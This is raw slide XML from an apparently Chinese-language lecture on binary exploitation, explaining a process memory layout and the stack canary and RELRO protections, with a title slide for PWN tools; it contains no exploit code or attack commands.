                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 1377">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6FA70D-C4BA-420B-B9F5-D2F0CD5A2E4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6" name="Shape 1378">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D4E8817-DA2C-43C5-AE04-5ECAF60D397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shared libraries</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Shape 1379">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB6F4F48-BE76-458F-B4B1-B258210B9E2F}"/>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8" name="Shape 1380">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863ABAE6-56DB-4A27-8D1E-97138CAC328B}"/>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Heap</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Shape 1381">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED23B8A8-D327-4F72-98A6-D0F8C5B21692}"/>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10" name="Shape 1382">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A39990-BD4B-4922-BA48-67B641A998CC}"/>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1" name="Shape 1383">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA78317-91AE-4D3C-AE95-1C06197F6F69}"/>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Unused</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Shape 1384">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D98A331F-B003-4133-9D1A-CABFFD7C2AF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="5"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3" name="Shape 1385">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{088D8FB8-845D-4E29-9847-8D00D96BDB4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="8"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4" name="Shape 1386">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6363E9DF-AEE0-493D-9780-F27B819E8778}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="10851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0xFFFFFFFF</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Shape 1387">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6168F1E5-F016-460B-9D3D-14365F0CB522}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="13593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0xC0000000</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Shape 1388">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E273D0-7BA2-4CE1-B0D2-C58432A8D362}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="2674225"/>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0x40000000</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Shape 1389">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F1CFCE-7071-4407-979C-E969CA241988}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="40585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0x08048000</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Shape 1390">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C9DA192-F45B-42DB-97EA-E5BC5597165A}"/>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19" name="Shape 1391">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC8C04F7-6D95-4BED-9D59-E69ED3613902}"/>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0" name="Shape 1392">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29CD1FE8-8BC9-4841-B565-DAED513B50DB}"/>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1393">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB3B58A-F753-4F18-AB6A-B4F842CC0B40}"/>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1394">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092B6566-C748-4F94-B9BD-E11B297E20AF}"/>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3" name="Shape 1395">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D994AF33-1178-4AA2-8E26-071FECC7A92A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="43620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0x00000000</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Shape 1396">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49C1C40A-1462-498C-B4F7-11994D4C9AAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Shape 1397">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB428279-963A-4DC2-BA36-D7F3502EFF53}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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Shape 1398">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03347C8C-5395-4B60-B37B-F165EDB80289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192340" y="1831647"/>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7" name="Shape 1399">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{733A2FD4-B60E-48CD-A9EA-2266621ACC3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192340" y="45383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8" name="Shape 1400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC6F853-578C-4DBB-ADEC-721D31748E13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192340" y="54795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Readable, Executable, Not Writable </a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Shape 1401">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD2957E1-4DAF-4B6B-9355-4B7857D66881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5607540" y="2150247"/>
            <a:ext cx="1373200" cy="7600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Shape 1402">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63F7CCFB-2091-4329-825C-643B71B6B253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="1"/>
            <a:endCxn id="28" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5607640" y="5413280"/>
            <a:ext cx="1400000" cy="392400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 1403">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54EA5155-F341-459A-ACE5-A6741C8B6640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631806" y="4684080"/>
            <a:ext cx="197200" cy="440000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 50000"/>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32" name="Shape 1404">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E90D4DCE-ABF9-44C9-856F-023949D87EBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="31" idx="1"/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5607406" y="4864480"/>
            <a:ext cx="1024400" cy="39600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="矩形 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C831CD26-2B74-4F61-A046-515D23B3B77B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1817080" y="611898"/>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4" name="矩形 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC2349D0-5403-4048-92AB-343AD10A9A9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38024999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5011909" y="2062584"/>
            <a:ext cx="154080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Canary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64EB43F5-BF87-475E-BC0B-CEACC438595C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="2647359"/>
            <a:ext cx="6476989"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在刚进入函数时，在栈上放置一个标志</a:t>
            </a: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，在函数返回时检测其是否被改变。以达到防护栈溢出的目的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>字长，其位置不一定与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>存储的位置相邻，具体得看程序的汇编操作</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987AF0A0-4384-4846-B332-AB17C6C6AC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Canary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12462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608162" y="2209961"/>
            <a:ext cx="6061275"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RELRO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RELocate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Read-Only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F97E162-B4E9-4A13-B493-BAD369BE022B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2700270" y="3146640"/>
            <a:ext cx="6791459"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在程序装入后</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将其中一些段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>.dynamic)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>标记为只读</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防止程序的一些重定位信息被修改</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完全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的基础上</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在程序装入时</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直接解析完所有符号并填入对应的值</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此时所有的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>GOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表项都已初始化</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且不装入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>link_map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dl_runtime_resolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的地址</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D6ECD6E-B0BC-4364-ADCF-50984C02141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RELRO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38431411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8C03585-494F-4FC7-8D36-567CF06A54C6}"/>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64962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Ex2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PWN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
